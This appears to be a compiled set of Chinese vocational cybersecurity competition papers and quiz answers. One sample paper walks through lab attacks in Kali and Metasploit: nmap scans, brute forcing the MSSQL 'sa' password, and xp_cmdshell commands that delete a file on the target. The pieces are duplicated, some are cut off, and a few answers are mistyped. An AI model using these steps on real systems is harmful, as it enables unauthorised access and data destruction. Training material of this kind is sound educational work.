江苏省中职组网络空间安全赛项赛题B

2018年全国职业院校技能大赛中职组“网络空间安全”赛卷一一、竞赛阶段二、拓扑图PC机环境：物理机：Windows7；虚拟机1：Ubuntu Linux 32bit（用户名：root；密码：toor）,安装工具集：Backtrack5,安装开发环境：Python3；虚拟机2：Kali（用户名：root；密码：toor）；虚拟机3：WindowsXP（用户名：administrator；密码：123456）。

三、竞赛任务书（一）第一阶段任务书（700分）任务1. ARP扫描渗透测试（100分）任务环境说明：✓服务器场景：server2003（用户名：administrator；密码：空）✓服务器场景操作系统：Windows server20031.通过本地PC中渗透测试平台BT5对服务器场景server2003进行ARP扫描渗透测试（使用工具arping，发送请求数据包数量为5个），并将该操作使用命令中固定不变的字符串作为Flag提交；（16分）2.通过本地PC中渗透测试平台BT5对服务器场景server2003进行ARP扫描渗透测试（使用工具arping，发送请求数据包数量为5个），并将该操作结果的最后1行，从左边数第2个数字作为Flag提交；（17分）3. 通过本地PC中渗透测试平台BT5对服务器场景server2003行ARP扫描渗透测试（使用工具Metasploit中arp_sweep模块），并将工具Metasploit 中arp_sweep模块存放路径字符串作为Flag（形式：字符串1/字符串2/字符串3/…/字符串n）提交；（16分）4. 通过本地PC中渗透测试平台BT5对服务器场景server2003进行ARP扫描渗透测试（使用工具Metasploit中arp_sweep模块），假设目标服务器场景CentOS5.5在线，请将工具Metasploit中arp_sweep模块运行显示结果的最后1行的最后1个单词作为Flag提交；（17分）5. 通过本地PC中渗透测试平台BT5对服务器场景server2003进行ARP 扫描渗透测试（使用工具Metasploit中arp_sweep模块），假设目标服务器场景CentOS5.5在线，请将工具Metasploit中arp_sweep模块运行显示结果的第1行出现的IP地址右边的第1个单词作为Flag提交；（16分）6. 通过本地PC中渗透测试平台BT5对服务器场景server2003进行ARP 扫描渗透测试（使用工具Metasploit中arp_sweep模块），假设目标服务器场景CentOS5.5在线，请将工具Metasploit中arp_sweep模块的运行命令字符串作为Flag提交；（18分）任务2. 漏洞扫描与利用（100分）任务环境说明：✓服务器场景：server2003（用户名：administrator；密码：空）✓服务器场景操作系统：Windows server20031.通过本地PC中渗透测试平台Kali对服务器场景server2003以半开放式不进行ping的扫描方式并配合a，要求扫描信息输出格式为xml文件格式，从生成扫描结果获取局域网（例如172.16.101.0/24）中存活靶机，以xml格式向指定文件输出信息（使用工具NMAP，使用必须要使用的参数），并将该操作使用命令中必须要使用的参数作为FLAG提交；（12分）2.根据第一题扫描的回显信息分析靶机操作系统版本信息，将操作系统版本信息作为FLAG提交；（9分）3.根据第一题扫描的回显信息分析靶机服务开放端口，分析开放的服务，并将共享服务的开放状态作为FLAG提交；（9分）4.在本地PC的渗透测试平台Kali中，使用命令初始化msf数据库，并将使用的命令作为FLAG提交；（10分）5.在本地PC的渗透测试平台Kali中，打开msf，使用db_import将扫描结果导入到数据库中，并查看导入的数据，将查看导入的数据要使用的命令作为FLAG提交；（10分）6.在msfconsole使用search命令搜索MS08067漏洞攻击程序，并将回显结果中的漏洞时间作为FLAG提交；（10分）7.在msfconsole中利用MS08067漏洞攻击模块，将调用此模块的命令作为FLAG提交；（10分）8.在上一步的基础上查看需要设置的选项，并将回显中需设置的选项名作为FLAG提交；（10分）9.使用set命令设置目标IP（在第8步的基础上），并检测漏洞是否存在，将回显结果中最后四个单词作为FLAG提交；（13分）10.查看可选项中存在此漏洞的系统版本，判断该靶机是否有此漏洞，若有，将存在此漏洞的系统版本序号作为FLAG提交，否则FLAG为none。

2018年全国职业院校技能大赛中职组“网络空间安全”正式赛卷一、竞赛阶段二、拓扑图PC机环境：物理机：Windows7；虚拟机1：Ubuntu Linux 32bit（用户名：root；密码：toor）,安装工具集：Backtrack5,安装开发环境：Python3；虚拟机2：Kali（用户名：root；密码：toor）；虚拟机3：WindowsXP（用户名：administrator；密码：123456）。

三、竞赛任务书（一）第一阶段任务书（700分）任务1. MSSQL数据库渗透测试（100分）任务环境说明：✓服务器场景：server2003（用户名：administrator；密码：空）✓服务器场景操作系统：Windows server20031.在本地PC渗透测试平台BT5中使用zenmap工具扫描服务器场景server2003所在网段(例如：172.16.101.0/24)范围内存活的主机IP地址和指定开放的1433、3306、80端口。

并将该操作使用的命令中必须要使用的字符串作为FLAG提交；（10分）2.通过本地PC中渗透测试平台BT5对服务器场景server2003进行系统服务及版本扫描渗透测试，并将该操作显示结果中数据库服务对应的服务端口信息作为FLAG提交；（10分）3.在本地PC渗透测试平台BT5中使用MSF中模块对其爆破，使用search命令，并将扫描弱口令模块的名称作为FLAG提交；（10分）4.在上一题的基础上使用命令调用该模块，并查看需要配置的信息（使用show options命令），将回显中需要配置的目标地址,密码使用的猜解字典,线程,账户配置参数的字段作为FLAG提交（之间以英文逗号分隔，例hello,test，..,..）；（10分）5.在msf模块中配置目标靶机IP地址，将配置命令中的前两个单词作为FLAG提交；（10分）6.在msf模块中指定密码字典，字典路径为/root/2.txt爆破获取密码并将得到的密码作为FLAG提交；（14分）7.在msf模块中切换新的渗透模块，对服务器场景server2003进行数据库服务扩展存储过程进行利用，将调用该模块的命令作为FLAG提交；（14分）8.在上一题的基础上，使用第6题获取到的密码并进行提权，同时使用show options命令查看需要的配置，并配置CMD参数来查看系统用户，将配置的命令作为FLAG提交；（14分）9.在利用msf模块获取系统权限并查看目标系统的异常（黑客）用户，并将该用户作为FLAG提交。

网络安全竞赛试题（小学版）【仅供参照学习】三、简答题(一)【1】小明新申请了一种邮箱，由于小明名字被注册了，因此小明使用了自己生日加名字xiaoming0807作为邮箱名，请问这样设立邮箱名与否合理，并给出一种理由1. 不合理2.泄漏了个人姓名和生日信息，容易被犯罪份子运用【2】04月19日，习近平总书记在网络安全和信息化工作座谈会上发言中提出了从三个方面把握互联网核心技术，这三个方面技术是1. 基本技术、通用技术2. 非对称技术、“杀手锏”技术3. 前沿技术、颠覆性技术【3】04月19日，习近平总书记在网络安全和信息化工作座谈会上发言中提出了全球互联网发展治理四项原则，这四项原则是1. 尊重网络主权2. 维护和平安全3. 开放合伙4.构建良好秩序【4】全球十大互联网公司有4个中华人民共和国公司，请问这四个公司是1. 阿里巴巴2. 腾讯3.百度4.京东【5】黑客们常会运用某些oday或1day漏洞对操作系统和软件进行袭击，那么什么是0day 和1day漏洞1.厂商没有发现、或没有公开漏洞（答对一种没有即可）2. 厂商已经发现并刚刚发布了补丁漏洞【6】网络空间安全基本内容涉及到1.密码学及应用2.网络安全3，系统安全4. 应用安全5.信息内容安全【7】网络安全中会用到诸多安全设备，请说出两种安全设备1. 防火墙2. 入侵检测系统3. 抗回绝服务袭击设备4.Web应用防火墙注：说出任意2种都可以【8】请说出三种黑客获取顾客密码方式1. 暴力破解2. 字典破解3. 木马窃取4. 撞库5.彩虹表破解注：说出任意3种都可以【9】请说出中华人民共和国首颗量子卫星名字，以及它重要研制单位和负责人名字1. 墨子号2. 中华人民共和国科学技术大学3.潘建伟【10】撞库是黑客通过收集互联网已泄露网站注册顾客和密码信息，尝试批量自动登录其她网站验证后，得到一系列可以登录真实账户，请给出两个能避免撞库袭击办法1. 每个网站都设立不同顾客名和密码2. 网站登录在密码之外还采用短信验证码等其她验证手段【11】网站服务器是当前黑客袭击首要目的之一，请给出3种网站服务器也许遭受袭击形式：1. 回绝服务袭击2. 网站挂马3. 网站后门4. 网站黑链5. 勒索袭击注：说出任意3种都可以【12】网站是当前互联网上最惯用服务，请说出三种开发一种网站使用到语言：1. HTML2. Javascript3. CSS4. 各类脚本语言如Python，Php，Ruby等5. Java注：说出任意3种都可以，【13】老式Windows系统中都会看到一种超级管理员(Administrator)账户，在新版Windows 系统中咱们不再能看到系统账户中有超级管理员,请给出微软公司这样设计理由1. Administrator账户不受顾客账户管理机制管理，在使用中存在很大风险，该账户被系统禁用了2.普通顾客可以使用自定义管理员组账号完毕需要管理员权限工作【14】为了进行权限控制，在创立顾客时，Windows系统提供了三类顾客供选取,请给出三类顾客名称：1. 管理员顾客，2. 原则顾客3. 宾客顾客【15】《网络安全法》里拟定网络安全法三条基本原则涉及哪些1. 网络空间主权原则2. 网络安全与信息化发展并重原则3. 共同治理原则【16】《网络安全法》进一步明确了政府各部门职责权限,请问网信某些和其她某些分别负责什么职责1. 国家网信部门负责统筹协调网络安全工作和有关监督管理工作2. 国务院电信主管部门、公安部门和其她关于机关依法在各自职责范畴内负责网络安全保护和监督管理工作【17】《网络安全法》完善了网络安全义务和责任，请说出3条网络运营者义务1. 守法义务2. 遵守社会公德、商业道德义务3. 诚实信用义务4. 网络安全保护义务5. 接受监督义务注：说出任意3种都可以，【18】徐玉玉事件，让大众更深刻地结识到了电信诈骗危害，国家发布了《关于办理电信网络诈骗等刑事案件合用法律若干问题意见》，请说出其中界定诈骗财物“数额较大”“数额巨大”“数额特别巨大"三个原则分别是多少1. 三千元以上为数额较大三万元以上为数额巨大五十万元以上为数额特别巨大【19】，国家发布了《国家网络空间安全战略》，其中指出国内网络安全形势日益严峻，请阐明国内哪四个方面安全受到威胁1. 网络渗入危害政治安全2. 网络袭击威胁经济安全3. 网络有害信息侵蚀文化安全4. 网络恐怖和违法犯罪破坏社会安全【20】，国家发布了《国家网络空间安全战略》，其中指出国内需要完善网络治理体系，健全网络安全法律法规体系，制定出台有关法律，请问《战略》中提及了那两部法律1. 网络安全法2. 未成年人网络保护条例三、简答题(二)1、《互联网顾客账号名称管理规定》中，对顾客申请账号时设立基本信息进行了限制。

2018年江苏省青少年网络信息安全知识竞赛题目及答案一、单选题（每题3分）1.( )是按备份周期对整个系统所有的文件(数据)进行备份,是克服系统数据不安全的最简单的方法。

A. 按需备份策略B. 完整备份策略C. 差分备份策略D. 增量备份策略。

参考答案：B2.对于新购买的电脑,不建议的行为是( ) A. 设置开机密码B. 安装QQ软件C. 让电脑公司重装XP系统D. 启用Windows Update。

参考答案：C3.下列操作中不能防范个人口令被字典暴力攻击的是( ) A. 确保口令不在终端上再现B. 避免使用过短的口令C. 使用动态口令卡产生的口令D. 严格限定从一个给定的终端进行非法认证的次数。

参考答案：A4.用户收到了一封可疑的电子邮件,要求用户提供银行账户及密码,这是属于何种攻击手段？( ) A. 缓存溢出攻击B. 钓鱼攻击C. 暗门攻击D. DDOS攻击。

参考答案：B5.Windows保存用户账户信息的文件是( ) A. SAM B. UserDB C. Passwd D. 注册表。

参考答案：A6.以下选项中计算机网络安全属性不包括哪一项( ) A. 机密性B. 完整性C. 可用性D. 稳定性。

参考答案：D7.单钥密码体制的保密性主要取决于( ) A. 密钥的安全性B. 密文的安全性C. 加密算法的安全性D. 解密算法的安全性。

参考答案：A8.橘皮书定义了4个安全层次,从D 层(最低保护层)到A 层(验证性保护层),属于D 级的系统是不安全的,以下操作系统中不属于C 级的是( ) A. UNIX 系统B. LINUX 系统C. WINDOWS 2000D. WINDOWS 98。

参考答案：D9.以下属于防范假冒热点攻击的措施是( ) A. 尽量使用免费WIFI B. 不要打开WIFI 的自动连接功能C. 在免费WIFI 上购物D. 任何时候不使用WIFI 联网。

参考答案：B10.IP地址不用于什么设备( ) A. 网络设备B. 网络上的服务器C. 移动硬盘D. 上网的计算机。

2018年全国职业院校技能大赛中职组“网络空间安全”赛卷十一、竞赛阶段二、拓扑图PC机环境：物理机：Windows7；虚拟机1：Ubuntu Linux 32bit（用户名：root；密码：toor）,安装工具集：Backtrack5,安装开发环境：Python3；虚拟机2：Kali（用户名：root；密码：toor）；虚拟机3：WindowsXP（用户名：administrator；密码：123456）。

三、竞赛任务书（一）第一阶段任务书（700分）任务1. MSSQL数据库渗透测试（100分）任务环境说明：✓服务器场景：server2003（用户名：administrator；密码：空）✓服务器场景操作系统：Windows server20031.在本地PC渗透测试平台BT5中使用zenmap工具扫描服务器场景server2003所在网段(例如：172.16.101.0/24)范围内存活的主机IP地址和指定开放的1433、3306、80端口。

并将该操作使用的命令中必须要使用的字符串作为FLAG提交；（10分）2.通过本地PC中渗透测试平台BT5对服务器场景server2003进行系统服务及版本扫描渗透测试，并将该操作显示结果中数据库服务对应的服务端口信息作为FLAG提交；（10分）3.在本地PC渗透测试平台BT5中使用MSF中模块对其爆破，使用search 命令，并将扫描弱口令模块的名称作为FLAG提交；（10分）4.在上一题的基础上使用命令调用该模块，并查看需要配置的信息（使用show options命令），将回显中需要配置的目标地址,密码使用的猜解字典,线程,账户配置参数的字段作为FLAG提交（之间以英文逗号分隔，例hello,test，..,..）；（10分）5.在msf模块中配置目标靶机IP地址，将配置命令中的前两个单词作为FLAG提交；（10分）6.在msf模块中指定密码字典，字典路径为/root/2.txt爆破获取密码并将得到的密码作为FLAG提交；（14分）7.在msf模块中切换新的渗透模块，对服务器场景server2003进行数据库服务扩展存储过程进行利用，将调用该模块的命令作为FLAG提交；（14分）8.在上一题的基础上，使用第6题获取到的密码并进行提权，同时使用show options命令查看需要的配置，并配置CMD参数来查看系统用户，将配置的命令作为FLAG提交；（14分）9.在利用msf模块获取系统权限并查看目标系统的异常（黑客）用户，并将该用户作为FLAG提交。

2014年江苏省高职技能大赛“信息安全及云安全”赛项比赛样题第一部分：赛题基础信息1、拓扑图2、IP地址规划表3、设备初始化信息第二部分：比赛试题任务一：安全网络组建（1000分）提示：按照赛题要求，将每道题答案以文字说明加配置截图方式填写到赛题答卷中。

DCRS需提交整机配置文件。

赛题答卷模板存放在‘提交专用U盘’根目录中。

1、根据拓扑图正确连接设备2、根据大赛规划设置IP地址与VLAN等基本信息。

3、要求中心防火墙和分支防火墙实现IPSEC VPN，使中心网段192.168.1.0/24段和分支网段192.168.2.0/24能通过IPSEC互通。

4、中心端防火墙要保证中心端内网192.168.1.0/24能够访问外网，即内网192.168.1.0段的机器能够访问1.1.1.2即可；5、中心端服务器192.168.1.10/24是一台web服务器，需要映射到外网，同时要保证内网和外网否能通过1.1.1.3的公网地址访问该服务器；6、为保证内网终端安全，要求内网所有用户的MAC地址与接入交换机接口进行绑定；7、进一步保证内网安全，在接入层交换机的1-8接口配置端口隔离。

8、由于内部人员总是下载数据，所以将内部的PCB进行流量限制,流量限制在5M/s。

在内网接入层交换机上配置。

9、在中心端防火墙上为防止内网用户占用带宽较高，针对内网P2P下载限制流量到10M；10、为提交中心端内网用户上班效率，要求中心端防火墙禁止使用IM等。

任务二：渗透测试及安全防护A、网站防护任务（700分）提示：WEB服务器为DCST-N10设备的ETH0接口。

按照赛题要求，将每道题答案以文字说明加配置截图方式填写到赛题答卷中。

赛题答卷模板存放在本地计算机‘提交专用U盘’根目录中。

为避免产生环路而造成的比赛时间耽误，请勿将WEB服务器与系统服务器同时连接交换机。

作为公司的网络管理者，你发现你所在的公司网站极不安全，在一次次的检测中，发现有一名不法者以SQL注入等方式入侵了你公司的网站，为此你要做出正确的部署，以保护网站的安全。

2018年度全国职业技能大赛中职组“网络空间安全”赛项江苏省竞赛任务书（样题）一、竞赛时间9:00-12:00，共计3小时。

二、竞赛阶段简介三、竞赛任务书内容（一）拓扑图（二）第一阶段任务书任务1.ARP扫描渗透测试任务环境说明：✓服务器场景：CentOS5.5✓服务器场景操作系统：CentOS5.51.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试（使用工具arping，发送请求数据包数量为5个），并将该操作使用命令中固定不变的字符串作为Flag提交；Arping –c 52.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试（使用工具arping，发送请求数据包数量为5个），并将该操作结果的最后1行，从左边数第2个数字作为Flag提交；Arping –c 5root@kali:~# arping -c 5ARPING from eth0Unicast reply from [00:0C:29:62:80:73] 1.017msUnicast reply from [00:0C:29:62:80:73] 0.638msUnicast reply from [00:0C:29:62:80:73] 1.051msUnicast reply from [00:0C:29:62:80:73] 1.590msUnicast reply from [00:0C:29:62:80:73] 1.051msSent 5 probes (1 broadcast(s))Received 5 response(s)Flag:53.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试（使用工具Metasploit中arp_sweep模块），并将工具Metasploit 中arp_sweep模块存放路径字符串作为Flag（形式：字符串1/字符串2/字符串3/…/字符串n）提交；msf > use auxiliary/scanner/discovery/arp_sweepFlag:Auxiliary/scanner/discovery/arp_sweep4.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试（使用工具Metasploit中arp_sweep模块），假设目标服务器场景CentOS5.5在线，请将工具Metasploit中arp_sweep模块运行显示结果的最后1行的最后1个单词作为Flag提交；msf > use auxiliary/scanner/discovery/arp_sweepmsf auxiliary(arp_sweep) > run[*] appears to be up (VMware, Inc.).[*] appears to be up (VMware, Inc.).[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completedFlag:completed5.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试（使用工具Metasploit中arp_sweep模块），假设目标服务器场景CentOS5.5在线，请将工具Metasploit中arp_sweep模块运行显示结果的第1行出现的IP地址右边的第1个单词作为Flag提交；msf auxiliary(arp_sweep) > run[*] appears to be up (VMware, Inc.).[*] appears to be up (VMware, Inc.).[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completedFlag:appears6.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试（使用工具Metasploit中arp_sweep模块），假设目标服务器场景CentOS5.5在线，请将工具Metasploit中arp_sweep模块的运行命令字符串作为Flag提交；Flag:exploit or run任务2.操作系统及应用程序扫描渗透测试任务环境说明：✓服务器场景：CentOS5.5✓服务器场景操作系统：CentOS5.51.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ping扫描渗透测试（使用工具nmap，使用参数n，使用必须要使用的参数），并将该操作使用命令中必须要使用的参数作为Flag提交；Flag:Nmap –n –Sp2.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ping扫描渗透测试（使用工具nmap），并将该操作显示结果的上数第3行左数第3个单词作为Flag提交；root@kali:~# nmap -n -sPStarting Nmap 7.40 ( ) at 2017-12-10 19:59 ESTNmap scan report forHost is up (0.00069s latency).Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds Flag:up3.通过PC2中渗透测试平台对服务器场景CentOS5.5进行综合性扫描渗透测试（使用工具nmap，使用参数n，使用必须要使用的参数），并将该操作使用命令中必须要使用的参数作为Flag提交；root@kali:~# nmap -n -AStarting Nmap 7.40 ( ) at 2017-12-10 20:11 ESTNmap scan report forHost is up (0.00025s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 4.3 (protocol 2.0)| ssh-hostkey:| 1024 95:7e:e7:af:67:6f:3b:ad:dd:4d:37:a6:34:ac:6c:08 (DSA) |_ 2048 90:3f:56:9b:cd:c7:5b:aa:1c:40:57:4d:45:c4:c1:cd (RSA) 111/tcp open rpcbind 2 (RPC #100000)| rpcinfo:| program version port/proto service| 100000 2 111/tcp rpcbind| 100000 2 111/udp rpcbind| 100024 1 910/udp status|_ 100024 1 913/tcp statusMAC Address: 00:0C:29:62:80:73 (VMware)Device type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:linux_kernel:2.6OS details: Linux 2.6.9 -Network Distance: 1 hopTRACEROUTEHOP RTT ADDRESS1 0.25 msOS and Service detection performed. Please report any incorrect results at / .Nmap done: 1 IP address (1 host up) scanned in 8.22 secondsFlag:Nmap –n –A4.通过PC2中渗透测试平台对服务器场景CentOS5.5进行综合性扫描渗透测试（使用工具nmap，使用参数n，使用必须要使用的参数），并将该操作显示结果的最后1行最后1个单词作为Flag提交；root@kali:~# nmap -n -AStarting Nmap 7.40 ( ) at 2017-12-10 20:11 ESTNmap scan report forHost is up (0.00025s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 4.3 (protocol 2.0)| ssh-hostkey:| 1024 95:7e:e7:af:67:6f:3b:ad:dd:4d:37:a6:34:ac:6c:08 (DSA) |_ 2048 90:3f:56:9b:cd:c7:5b:aa:1c:40:57:4d:45:c4:c1:cd (RSA) 111/tcp open rpcbind 2 (RPC #100000)| rpcinfo:| program version port/proto service| 100000 2 111/tcp rpcbind| 100000 2 111/udp rpcbind| 100024 1 910/udp status|_ 100024 1 913/tcp statusMAC Address: 00:0C:29:62:80:73 (VMware)Device type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:linux_kernel:2.6OS details: Linux 2.6.9 -Network Distance: 1 hopTRACEROUTEHOP RTT ADDRESS1 0.25 msOS and Service detection performed. Please report any incorrect results at / .Nmap done: 1 IP address (1 host up) scanned in 8.22 secondsFlag:seconds5.通过PC2中渗透测试平台对服务器场景CentOS5.5进行操作系统扫描渗透测试（使用工具nmap，使用必须要使用的参数），并将该操作使用命令中必须要使用的参数作为Flag提交；root@kali:~# nmap -OStarting Nmap 7.40 ( ) at 2017-12-10 20:13 ESTNmap scan report forHost is up (0.00044s latency).Not shown: 998 closed portsPORT STATE SERVICE22/tcp open ssh111/tcp open rpcbindMAC Address: 00:0C:29:62:80:73 (VMware)Device type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:linux_kernel:2.6OS details: Linux 2.6.9 -Network Distance: 1 hopOS detection performed. Please report any incorrect results at / .Nmap done: 1 IP address (1 host up) scanned in 14.80 seconds Flag:Nmap –O6.通过通过PC2中渗透测试平台对服务器场景CentOS5.5进行系统服务及版本号扫描渗透测试（使用工具nmap，使用必须要使用的参数），并将该操作使用命令中必须要使用的参数作为Flag提交；Flag:Nmap –sV7.通过通过PC2中渗透测试平台对服务器场景CentOS5.5进行系统服务及版本号扫描渗透测试（使用工具nmap，使用必须要使用的参数），并将该操作显示结果的SSH服务版本信息字符串作为Flag提交；root@kali:~# nmap -sVStarting Nmap 7.40 ( ) at 2017-12-10 20:17 ESTNmap scan report forHost is up (0.00014s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 4.3 (protocol 2.0)111/tcp open rpcbind 2 (RPC #100000)MAC Address: 00:0C:29:62:80:73 (VMware)Service detection performed. Please report any incorrect results at / .Nmap done: 1 IP address (1 host up) scanned in 19.60 seconds Flag:OpenSSH 4.3任务3.Web应用程序文件包含安全攻防任务环境说明：✓服务器场景名称：WebServ2003✓服务器场景安全操作系统：Microsoft Windows2003 Server✓服务器场景安装中间件：Apache2.2；✓服务器场景安装Web开发环境：Php6；✓服务器场景安装数据库：Microsoft SqlServer2000；✓服务器场景安装文本编辑器：EditPlus；1.访问WebServ2003服务器场景，"/"->"Display Uploaded's FileContent"，分析该页面源程序，找到提交的变量名，并将该变量名作为Flag（形式：name=“变量名”）提交；2.对该任务题目1页面注入点进行渗透测试，通过，并将注入语句作为Flag提交；3.对该任务题目2页面注入点进行注入以后，将当前页面以Base64编码方式回显内容作为Flag提交；4.通过PHP函数对题目3中Base64编码回显内容进行解码，并将解码内容作为Flag提交；5.进入WebServ2003服务器场景的目录，找到DisplayFileCtrl.php文件，使用EditPlus工具打开并填写该文件中空缺的F1、F2、F3、F4的值，使之可以抵御文件包含渗透测试，并提交Flag（形式：F1|F2|F3|F4）；6.再次对该任务题目1页面注入点进行渗透测试，验证此次利用该注入点对WebServ2003服务器场景进行文件包含渗透测试无效，并将回显页面源文件内容作为Flag提交；任务4.数据库安全加固任务环境说明：✓服务器场景名称：WebServ2003✓服务器场景安全操作系统：Microsoft Windows2003 Server✓服务器场景安装中间件：Apache2.2；✓服务器场景安装Web开发环境：Php6；✓服务器场景安装数据库：Microsoft SqlServer2000；✓服务器场景安装文本编辑器：EditPlus；1.对服务器场景WebServ2003安装补丁，使其中的数据库MicrosoftSqlServer2000能够支持远程连接，并将补丁包程序所在目录名称作为Flag提交；2.对服务器场景WebServ2003安装补丁，使其中的数据库MicrosoftSqlServer2000能够支持远程连接，在安装补丁后的服务器场景中运行netstat–an命令，将回显的数据库服务连接状态作为Flag提交；C:\Documents and Settings\Administrator>netstat -anActive ConnectionsProto Local Address Foreign Address State TCP LISTENINGTCP LISTENINGTCP LISTENINGTCP LISTENINGTCP LISTENINGUDP *:*UDP *:*UDP *:*UDP *:*UDP *:*UDP *:*UDP *:*UDP *:*Flag:LISTENING3.通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务扫描渗透测试，并将扫描结果作为Flag提交；msf > use auxiliary/scanner/mssql/mssql_pingmsf auxiliary(mssql_ping) > run[*] - SQL Server information for[+] - ServerName = SERVER[+] - InstanceName = MSSQLSERVER[+] - IsClustered = No[+] - Version =[+] - tcp = 1433[+] - np = \\SERVER\pipe\sql\query[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed4.通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务超级管理员口令暴力破解（使用PC2中的渗透测试平台中的字典文件superdic.txt），并将破解结果中的最后一个字符串作为Flag提交；msf > use auxiliary/scanner/mssql/mssql_loginmsf auxiliary(mssql_login) > set username samsf auxiliary(mssql_login) > set pass_file/usr/share/wordlists/metasploit/password.lstmsf auxiliary(mssql_login) > run[*] - - MSSQL - Starting authentication scanner.[!] - No active DB -- Credential data will not be saved![-] - - LOGIN FAILED: WORKSTATION\sa:!@#$% (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:!@#$%^ (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:!@#$%^& (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!@#$%^&* (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!boerbul (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!boerseun (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!gatvol (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!hotnot (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:!kak (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!koedoe (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!likable (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!poes (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!pomp (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!soutpiel (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:.net (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:0 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:000000 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:00000000 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:0007 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:007 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:007007 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:0s (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:0th (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:10 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:100 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1000 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1000s (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:100s (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1022 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:10s (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:10sne1 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1111 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:11111 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:111111 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa: (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:112233 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1212 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:121212 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1213 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1214 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1225 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:123 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:123123 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:123321 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1234 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:12345 (Incorrect: ) [+] - - LOGIN SUCCESSFUL: WORKSTATION\sa:123456[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completedFlag: completed5.通过PC2中de1渗透测试平台对服务器场景WebServ2003进行数据库服务扩展存储过程进行利用，删除WebServ2003服务器场景C:\1.txt，并将渗透测试利用命令以及渗透测试平台run结果第1行回显作为Flag 提交；msf auxiliary(mssql_login) > use auxiliary/admin/mssql/mssql_exec msf auxiliary(mssql_exec) > set rhostmsf auxiliary(mssql_exec) > set password 123456msf auxiliary(mssql_exec) > set cmd cmd.exe /c del "C:\\1.txt" msf auxiliary(mssql_exec) > run[*] - SQL Query: EXEC master..xp_cmdshell 'cmd.exe /c del C:\1.txt' output------[*] Auxiliary module execution completedFlag: [*] - SQL Query: EXEC master..xp_cmdshell 'cmd.exe /c del C:\1.txt'6.通过对服务器场景WebServ2003的数据库服务进行安全加固，阻止PC2中渗透测试平台对其进行数据库超级管理员密码暴力破解渗透测试，并将加固身份验证选项中的最后一个字符串作为Flag提交：W7.验证在WebServ2003的数据库服务进行安全加固后，再次通过PC2中渗透测试平台对服务器场景WebServ2003进行数据库服务超级管理员口令进行暴力破解（使用PC2中的渗透测试平台中的字典文件superdic.txt），并将破解结果的从上向下数第3行内容作为Flag提交；msf auxiliary(mssql_login) > run[*] 